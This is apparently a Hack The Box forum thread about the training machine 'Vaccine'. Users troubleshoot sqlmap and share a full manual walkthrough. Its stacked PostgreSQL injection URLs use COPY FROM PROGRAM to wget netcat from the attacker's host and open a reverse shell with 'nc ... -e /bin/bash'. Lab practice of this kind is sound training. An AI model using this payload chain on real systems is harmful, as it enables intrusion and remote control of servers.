Machine name: vaccine stuck on getting SQL code execution shell

Getting through this box is going to need some stubborn determination, I think. If anything, it's a good thing that it's not working, because it's going to force us to think for ourselves and self-learn what we don't know. There will be another way in, I am sure.

I'm not using MSF; I'm trying to use it sparingly, as I don't believe MSF is a very good tool for learning. I'm trying a manual exploit, but I keep getting timeouts on port 80, which makes that kind of hard.

Hello,

If you want to do it by hand you can follow this link:
Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest | by Greenwolf | Greenwolf Security | Medium

And if someone prefers, I coded a python script available here:
GitHub - florianges/-HTB-Vaccine_sql_injection

good luck

Hello,
I have the same issue: a timeout when using the --os-shell option with sqlmap.
Doing it manually (with florianges's python script) does not seem to solve the issue.

Same here with sqlmap, and manually or with @florianges's script, which is also not working and seems to fail after the last command: "ERROR: program "/tmp/XXXXX/nc 10.10.14.XX 4444 -e /bin/bash" failed DETAIL: command not found"

@florianges said:

Hello,

If you want to do it by hand you can follow this link:
Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest | by Greenwolf | Greenwolf Security | Medium

And if someone prefers, I coded a python script available here:
GitHub - florianges/-HTB-Vaccine_sql_injection

good luck

Thanks for this really appreciate the assistance! I finally managed to root this box!

Hello,
@SIFGU and @OS41380

Did you open the script and read the comments and meet all of the requirements listed?
Have you watched the youtube presentation video?

@Pyroteq said:

@0ne-nine9 said:

Hello everyone,

For those experiencing issues with port 80 interaction on Vaccine, please take note that as @drugantibus reported, this is due to users exiting their os-shell improperly. You will have to issue a reset vote every time Vaccine is unresponsive on port 80 or switch servers to find a working Vaccine SQL service.

Thank you.

I've been stuck on this for days now because people keep crashing the server. Literally as soon as a reset vote is done, someone almost IMMEDIATELY screws it up again... Very frustrating, especially as this is supposed to be a beginner box.

Does VIP access include VIP access to the starting servers or only the servers past this point? At this stage I’m willing to just throw money at the issue so I can move on.

Hiya,

Yes, VIP includes a separate server for Starting Point VIP. However, there's no assurance that VIP members will not create instability on the box, as the number of VIP servers for Starting Point is smaller than that of the main machines.

Maybe try tackling the machine at a different time of day.

Thanks!

I guess the box is still stuck, I voted to reset the lab.

I really struggled on this one with the same issues, gave up on sqlmap and used @florianges' Python script. I struggled to understand the nc parameter I was meant to set. I couldn't get it working at first, but in the end I literally followed his video step by step, copied the bin file (cp /bin/nc .) into the same location as the web server, and then it worked. I was just taking an nc.exe file, copying it into the location and then setting the parameter to nc.exe, but that was wrong.

@florianges this script is awesome - worked perfectly for me! Thanks so much!

@florianges said:

Hello,
@SIFGU and @OS41380

Did you open the script and read the comments and meet all of the requirements listed?
Have you watched the youtube presentation video?

https://www.youtube.com/watch?v=2k7IirmLlxs

I do that,
but nothing showing with “nc”

@ma24th said:

I do that,
but nothing showing with “nc”

I think the web server is down now. It was loading fine earlier but it won’t load in the browser now either…

We need 2 more votes to reset the lab in US VIP if you want to join…

Hi guys, I need help with this machine... when I run sqlmap with the right cookie it gives me a 302 redirect to index.php.

Anyone know how to get past this?

sqlmap -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID:3dr3h62vjq0tn58mu5o1oep0e8"
[21:43:28] [INFO] testing connection to the target URL
got a 302 redirect to 'http://10.10.10.46:80/index.php'. Do you want to follow? [Y/n] n
[21:43:29] [INFO] testing if the target URL content is stable
[21:43:29] [WARNING] GET parameter 'search' does not appear to be dynamic
[21:43:30] [WARNING] heuristic (basic) test shows that GET parameter 'search' might not be injectable
[21:43:30] [INFO] testing for SQL injection on GET parameter 'search'
[21:43:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:43:30] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[21:43:30] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[21:43:31] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[21:43:31] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[21:43:32] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[21:43:32] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[21:43:32] [INFO] testing 'Generic inline queries'
[21:43:32] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[21:43:32] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[21:43:33] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[21:43:33] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[21:43:34] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[21:43:34] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[21:43:34] [INFO] testing 'Oracle AND time-based blind'

Hi,

It looks like a few people had questions about how to manually perform the SQL injection. Using florianges's methodology, I was able to get it working manually. Here is what I did:

Assumptions: you are logged into the website using admin creds.

  1. Stand up a simple web server on port 80
    [sudo python3 -m http.server 80]
  2. In the case of the server above, my server makes my desktop the root directory. So I made sure I had a copy of netcat on my desktop (I put it in a folder called bin for funsies)
  3. Open up netcat on port 4444 (or whatever port)
    [nc -lvnp 4444]
  4. Following florianges's (respect given for code) methodology, I pasted the following lines into my browser window to take advantage of the SQL injection vulnerability:
    [http://10.10.10.46/dashboard.php?search=a';DROP TABLE IF EXISTS cmd_27440; -- -]
    [http://10.10.10.46/dashboard.php?search=a';CREATE TABLE cmd_27440(cmd_output text); -- -]
    [http://10.10.10.46/dashboard.php?search=a';COPY cmd_27440 FROM PROGRAM 'wget -P /tmp/27440 http://10.10.14.XX:80/bin/nc'; -- -]
    [http://10.10.10.46/dashboard.php?search=a';COPY cmd_27440 FROM PROGRAM 'chmod 777 /tmp/27440/nc'; -- -]
    [http://10.10.10.46/dashboard.php?search=a';COPY cmd_27440 FROM PROGRAM '/tmp/27440/nc 10.10.14.XX 4444 -e /bin/bash'; -- -]
    note1: the XX's in some IP addresses represent my IP address.
  5. Check netcat - you should have a terminal. Do a test command like whoami if you'd like.
    --- fin ---

note2: the number 27440 is a random number. I'd recommend changing it when you execute.

This challenge was a little trickier due to sqlmap not working, but I enjoyed learning how to do a manual SQL injection. If anyone is able to help me understand why sqlmap isn't working, I'd be interested to know.

Cheers,
bii

@deeptestpilot said:

Hi guys, I need help with this machine... when I run sqlmap with the right cookie it gives me a 302 redirect to index.php.

Anyone know how to get past this?

sqlmap -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID:3dr3h62vjq0tn58mu5o1oep0e8"
[21:43:28] [INFO] testing connection to the target URL
got a 302 redirect to 'http://10.10.10.46:80/index.php'. Do you want to follow? [Y/n] n
[21:43:29] [INFO] testing if the target URL content is stable

You have an error in the command. It should be PHPSESSID=3dr3h62vjq0tn58mu5o1oep0e8. You copied it from the web browser with ":" and used PHPSESSID:3dr3h62vjq0tn58mu5o1oep0e8.

I understand the vulnerability, thanks to the link posted by @florianges. I can also read and understand the python script. How did you learn about dashboard.php?

Hi! I guess accessing the server was not an issue, and SQL injection was not mandatory to gain OS access. I simply used the ftpuser password from the last lab's FileZilla config to log in to the server and gain access to the postgresql user. But now I'm stuck with the privilege escalation!

@henriqscx said:

I understand the vulnerability, thanks to the link posted by @florianges. I can also read and understand the python script. How did you learn about dashboard.php?

Brute-force the website. Use either dirbuster, dirsearch or gobuster with a wordlist of known files/directories and it will pop up.